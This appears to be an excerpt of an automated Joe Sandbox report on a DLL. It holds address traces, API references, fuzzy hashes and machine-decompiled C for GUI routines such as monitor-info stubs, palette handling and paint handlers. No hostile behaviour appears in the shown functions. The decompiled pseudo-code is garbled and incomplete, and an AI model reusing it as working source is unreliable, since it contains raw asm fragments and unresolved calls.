0x0071cada
0x0071cae4
0x0071caf1
0x0071caf6
0x0071caf6
0x0071cafd
0x0071cb08
0x0071caff
0x0071cb01
0x0071cb01
0x0071cb0f
0x0071cb12
0x0071cb17
0x0071cb1e
0x0071cb1f
0x0071cb24
0x0071cb27
0x0071cb38
0x0071cb3d
0x0071cb3e
0x0071cb43
0x0071cb46
0x0071cb4d
0x0071cb58
0x0071cb5c
0x0071cb5c
0x0071cb5c
0x0071cb5e
0x0071cb65
0x0071cc11
0x0071cc13
0x0071cc16
0x0071cc19
0x0071cc26
0x0071cb6b
0x0071cc0b
0x0071cb7a
0x0071cb82
0x0071cb8c
0x0071cb9c
0x0071cbaa
0x0071cbb5
0x0071cbba
0x0071cbbd
0x0071cbdb
0x0071cbde
0x0071cbe1
0x0071cbe6
0x0071cbeb
0x0071cbf0
0x00000000
0x00000000
0x00000000
0x0071cc0b

APIs

GetCurrentThreadId.KERNEL32 ref: 0071CAC3
GetCurrentThreadId.KERNEL32 ref: 0071CAD2

Part of subcall function 0071CA90: ResetEvent.KERNEL32(000001A4,0071CB0D), ref: 0071CA96

RtlEnterCriticalSection.KERNEL32(0076F870), ref: 0071CB17
InterlockedExchange.KERNEL32(0076C404,?), ref: 0071CB33
RtlLeaveCriticalSection.KERNEL32(0076F870,00000000,0071CC27,?,00000000,0071CC46,?,0076F870), ref: 0071CB8C
RtlEnterCriticalSection.KERNEL32(0076F870,0071CBF8,0071CC27,?,00000000,0071CC46,?,0076F870), ref: 0071CBEB

Strings

LXq, xrefs: 0071CAEC

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID: LXq
API String ID: 2189153385-3550559040
Opcode ID: 4e50c93e36406ec7adfc929aa4550b6fceb055f2dad30197eca802ea83b1c6ed
Instruction ID: 2e4eb0fc6b0fc0f3e6a18f2229f5afd473e0c7061dac18ddddd1077c22b599f2
Opcode Fuzzy Hash: 4e50c93e36406ec7adfc929aa4550b6fceb055f2dad30197eca802ea83b1c6ed
Instruction Fuzzy Hash: 5831DFB0A88344EFD712DFA8D856AADBBF8EB09700F5184A0F801D72D1D73D9D90CA61

Uniqueness

Uniqueness Score: -1.00%

Function 007272A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E007272A0(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x76f920 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00706548();
						}
						_t24 = 1;
					}
				} else {
					 *0x76f904 = E00726F70(4, _t23,  *0x76f904, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}

0x007272a9
0x007272ac
0x007272b6
0x007272db
0x007272e3
0x00727303
0x00727308
0x00727313
0x0072731e
0x00727328
0x00727329
0x0072732a
0x0072732b
0x0072732c
0x0072732d
0x00727337
0x00727339
0x00727341
0x00727342
0x00727342
0x00727347
0x00727347
0x007272b8
0x007272ca
0x007272d7
0x007272d7
0x00727351

APIs

GetMonitorInfoA.USER32(?,?), ref: 007272D1
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 007272F8
GetSystemMetrics.USER32 ref: 0072730D
GetSystemMetrics.USER32 ref: 00727318
lstrcpy.KERNEL32(?,DISPLAY), ref: 00727342

Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0

Strings

DISPLAY, xrefs: 00727339
GetMonitorInfo, xrefs: 007272B8

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: faa2bf3c78363656ebe8d97e064c57b15722031e0f0896c89ab185fbcb1d40a4
Instruction ID: 2a61f82873bb2949b7cebe9e3513fa15fd2828733493dc16a17f3e4b77a10526
Opcode Fuzzy Hash: faa2bf3c78363656ebe8d97e064c57b15722031e0f0896c89ab185fbcb1d40a4
Instruction Fuzzy Hash: BD110071606326AFD728CF64BE457A7B7E8FB45310F00852AEC46C7281D3B8B800CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00727374 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00727374(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x76f921 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00706548();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x76f908; // 0x727374
					 *0x76f908 = E00726F70(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x76f908(_t27, _t29);
				}
				return _t24;
			}

0x0072737d
0x00727380
0x0072738a
0x007273af
0x007273b7
0x007273d7
0x007273dc
0x007273e7
0x007273f2
0x007273fc
0x007273fd
0x007273fe
0x007273ff
0x00727400
0x00727401
0x0072740b
0x0072740d
0x00727415
0x00727416
0x00727416
0x0072741b
0x0072741b
0x0072738c
0x00727391
0x0072739e
0x007273ab
0x007273ab
0x00727425

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 007273CC
GetSystemMetrics.USER32 ref: 007273E1
GetSystemMetrics.USER32 ref: 007273EC
lstrcpy.KERNEL32(?,DISPLAY), ref: 00727416

Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0

Strings

DISPLAY, xrefs: 0072740D
GetMonitorInfoA, xrefs: 0072738C
tsr, xrefs: 00727391, 0072739E, 007273A5

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA$tsr
API String ID: 2545840971-1443938628
Opcode ID: 6948204b00c4736a00254b0286c18a602e4944eff56f25d50fa57b22ed9beac3
Instruction ID: fc0b7b83a5d3b733e5d33503d3cf8d3123a53d6f32dfda92e41b44634b1760db
Opcode Fuzzy Hash: 6948204b00c4736a00254b0286c18a602e4944eff56f25d50fa57b22ed9beac3
Instruction Fuzzy Hash: 31110371605365AFD724EF61BD447A7BBE8EB05310F208939ED46C7250D2B8B840CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00727448 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00727448(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x76f922 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00706548();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x76f90c; // 0x727448
					 *0x76f90c = E00726F70(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x76f90c(_t27, _t29);
				}
				return _t24;
			}

0x00727451
0x00727454
0x0072745e
0x00727483
0x0072748b
0x007274ab
0x007274b0
0x007274bb
0x007274c6
0x007274d0
0x007274d1
0x007274d2
0x007274d3
0x007274d4
0x007274d5
0x007274df
0x007274e1
0x007274e9
0x007274ea
0x007274ea
0x007274ef
0x007274ef
0x00727460
0x00727465
0x00727472
0x0072747f
0x0072747f
0x007274f9

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 007274A0
GetSystemMetrics.USER32 ref: 007274B5
GetSystemMetrics.USER32 ref: 007274C0
lstrcpy.KERNEL32(?,DISPLAY), ref: 007274EA

Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0

Strings

GetMonitorInfoW, xrefs: 00727460
Htr, xrefs: 00727465, 00727472, 00727479
DISPLAY, xrefs: 007274E1

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW$Htr
API String ID: 2545840971-3682609493
Opcode ID: c7b106064d9c087484cbb09baa92b0022544e51a7a205391c70c290a02b66c55
Instruction ID: efb40d469cac4b0b1fc27c853a7c259c79594e88ef358a76f06590662039dc17
Opcode Fuzzy Hash: c7b106064d9c087484cbb09baa92b0022544e51a7a205391c70c290a02b66c55
Instruction Fuzzy Hash: FA110071605325AFD724DF21BD44BA7BBE8EB05310F00852AFD46D7280D6B8B800CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 007216B4 Relevance: 12.1, APIs: 8, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E007216B4(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E007028C8(_t24, 0x40,  &_v1032);
				_push(0);
				L007068E8();
				_v8 = _t25;
				_push(_t54);
				_push(0x7217b1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00706630();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L00706670();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L00706670();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L00706670();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L00706670();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L00706670();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E007217B8);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00706B28();
				return _t29;
			}

0x007216b5
0x007216be
0x007216c7
0x007216db
0x007216e0
0x007216e2
0x007216e7
0x007216ec
0x007216ed
0x007216f2
0x007216f5
0x007216f8
0x007216fa
0x007216fd
0x007216fe
0x00721703
0x00721708
0x00721714
0x00721715
0x00721717
0x0072171c
0x0072171d
0x0072172c
0x00721788
0x00721789
0x0072178e
0x00721792
0x00721793
0x0072172e
0x00721734
0x00721735
0x0072173c
0x00721740
0x00721741
0x00721754
0x00721755
0x0072175a
0x0072175e
0x0072175f
0x0072176a
0x0072176b
0x0072176d
0x00721772
0x00721773
0x00721773
0x0072172c
0x0072179a
0x0072179d
0x007217a0
0x007217a5
0x007217a8
0x007217a9
0x007217ab
0x007217b0

APIs

7378AC50.USER32(00000000), ref: 007216E2
7378AD70.GDI32(?,00000068,00000000,007217B1,?,00000000), ref: 007216FE
7378AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,007217B1,?,00000000), ref: 0072171D
7378AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,007217B1,?,00000000), ref: 00721741
7378AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,007217B1), ref: 0072175F
7378AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 00721773
7378AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,007217B1,?,00000000), ref: 00721793
7378B380.USER32(00000000,?,007217B8,007217B1,?,00000000), ref: 007217AB

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$B380
String ID:
API String ID: 817970651-0
Opcode ID: 8426f57d02829ca92bede9346504a541b55841e4bc6e7a4186ec4d778b853704
Instruction ID: 680804f96925f9ba74f7687556af57af1129d9a20718ebfe2e1b476979e3f84b
Opcode Fuzzy Hash: 8426f57d02829ca92bede9346504a541b55841e4bc6e7a4186ec4d778b853704
Instruction Fuzzy Hash: D02131F5A40218EADB10DBA4CD96FAE73FCEB48704F9005A1F704E62C1D6799F549B24

Uniqueness

Uniqueness Score: -1.00%

Function 0074AC94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0074AC94(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t3 =  &_v12; // 0x73263e
				_t75 =  *( *_t3 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0074CFE0(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x74adb4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E0071707C( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0074ADEC(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x74adbb);
				_t41 =  &_v12; // 0x73263e
				_t55 =  *_t41;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0074CFE0(_v8),  &_v84);
				}
				return _t55;
			}

0x0074ac95
0x0074ac97
0x0074ac9d
0x0074aca0
0x0074aca3
0x0074aca6
0x0074acab
0x0074acbf
0x0074acbf
0x0074acc3
0x0074acc4
0x0074acc9
0x0074accc
0x0074acd9
0x0074acf3
0x0074acf6
0x0074ad09
0x0074ad0c
0x0074ad0e
0x0074ad0f
0x0074ad11
0x0074ad1c
0x0074ad25
0x0074ad37
0x00000000
0x0074ad39
0x0074ad55
0x0074ad5c
0x00000000
0x00000000
0x0074ad5c
0x00000000
0x00000000
0x00000000
0x00000000
0x0074ad5e
0x0074ad5e
0x0074ad5f
0x0074ad5f
0x0074ad11
0x0074ad62
0x0074ad66
0x0074ad6f
0x0074ad6f
0x0074ad7a
0x0074acdb
0x0074ace2
0x0074ace2
0x0074ad86
0x0074ad8d
0x0074ad90
0x0074ad93
0x0074ad98
0x0074ad98
0x0074ad9f
0x00000000
0x0074adae
0x0074adb3

APIs

BeginPaint.USER32(00000000,?), ref: 0074ACBA
SaveDC.GDI32(?), ref: 0074ACEE
ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0074AD50
RestoreDC.GDI32(?,00732617), ref: 0074AD7A
EndPaint.USER32(00000000,?,0074ADBB), ref: 0074ADAE

Strings

>&s, xrefs: 0074ACA3, 0074AD98

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID: >&s
API String ID: 3808407030-3680940586
Opcode ID: 2073a333552f5cde487dbbe3617fbac5856c79151eed2d7c286d76ff4b0b6956
Instruction ID: 0832324c83e889f00b14a5bf165f9f8a7a0e513d8288a7e776f59d4db217b8e3
Opcode Fuzzy Hash: 2073a333552f5cde487dbbe3617fbac5856c79151eed2d7c286d76ff4b0b6956
Instruction Fuzzy Hash: 03413B70E40604EFCB14DF98C889FAEB7F9AF48305F1580A8E9049B66ADB399D44CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0072404C Relevance: 10.6, APIs: 7, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0072404C(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = L00721908(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L007068E8();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00706590();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x7240fb);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x724102);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00706B28();
						return _t31;
					}
				}
			}

0x0072404c
0x0072404d
0x0072404f
0x00724057
0x0072405a
0x0072405e
0x00724102
0x00724107
0x0072406f
0x0072407d
0x00724082
0x00724086
0x00000000
0x00724088
0x00724088
0x0072408a
0x0072408f
0x00724092
0x00724095
0x00724096
0x0072409b
0x007240a8
0x007240ad
0x007240ae
0x007240b3
0x007240b6
0x007240c7
0x007240ce
0x007240d1
0x007240d4
0x007240e1
0x007240ea
0x007240ef
0x007240f2
0x007240f3
0x007240f5
0x007240fa
0x007240fa
0x00724086

APIs

Part of subcall function 00721908: GetObjectA.GDI32(?,00000004), ref: 0072191F
Part of subcall function 00721908: 7378AEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,00724082), ref: 00721942

7378AC50.USER32(00000000), ref: 0072408A
7378A590.GDI32(?,00000000), ref: 00724096
SelectObject.GDI32(?), ref: 007240A3
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,007240FB,?,?,?,?,00000000), ref: 007240C7
SelectObject.GDI32(?,?), ref: 007240E1
DeleteDC.GDI32(?), ref: 007240EA
7378B380.USER32(00000000,?,?,?,?,00724102,?,00000000,007240FB,?,?,?,?,00000000), ref: 007240F5

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$Object$Select$A590B380ColorDeleteTable
String ID:
API String ID: 1557749399-0
Opcode ID: e8b6a2286073231652af05966643d5bd971eb727106908dc0677aa89f497742f
Instruction ID: 37f70715bcd01b5735e21b24e85bb2ef08353ed4e86c69146c25dc28bf21714b
Opcode Fuzzy Hash: e8b6a2286073231652af05966643d5bd971eb727106908dc0677aa89f497742f
Instruction Fuzzy Hash: B91166B5E00219EFDB10EBE4DC56EAEB7FCEB08300F5045A5F604E7281DA799D508750

Uniqueness

Uniqueness Score: -1.00%

Function 00732470 Relevance: 9.2, APIs: 6, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00732470(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x73263e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E00746470(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E00745268( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E0074AC94(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x73264c);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E00720724( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E00720724( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E007323E4(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E0073290C(_v8) == 0 || E00732430(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E0072F750( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E007323E4(_t150);
							} else {
								E007323E4(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

0x00732470
0x00732470
0x00732470
0x00732470
0x00732471
0x00732473
0x00732476
0x00732479
0x00732481
0x00732484
0x00732594
0x0073259b
0x007325b3
0x007325b3
0x007325b8
0x007325b9
0x007325be
0x007325c1
0x007325c8
0x007325d8
0x007325e6
0x007325ee
0x007325f4
0x00732607
0x00732607
0x00732612
0x00732619
0x0073261c
0x0073261f
0x00732628
0x00000000
0x00732638
0x0073263d
0x0073248a
0x0073248a
0x0073248d
0x007324cd
0x007324db
0x007324e9
0x007324f8
0x00732514
0x00732533
0x00732533
0x00732538
0x0073253b
0x0073248f
0x0073248f
0x00732492
0x00732548
0x0073254e
0x00732558
0x00732568
0x00732579
0x00732575
0x00732575
0x00732575
0x00732584
0x00732584
0x00732498
0x0073249b
0x00732646
0x007324a1
0x007324a2
0x007324a8
0x007324af
0x007324b5
0x007324b8
0x007324b8
0x007324af
0x0073249b
0x00732492
0x0073264f
0x0073264f

APIs

FillRect.USER32 ref: 007324E9
GetClientRect.USER32 ref: 00732514
FillRect.USER32 ref: 00732533

Part of subcall function 007323E4: CallWindowProcA.USER32 ref: 0073241E

BeginPaint.USER32(?,?), ref: 007325AB
GetWindowRect.USER32 ref: 007325D8
EndPaint.USER32(?,?,0073264C), ref: 00732638

Memory Dump Source

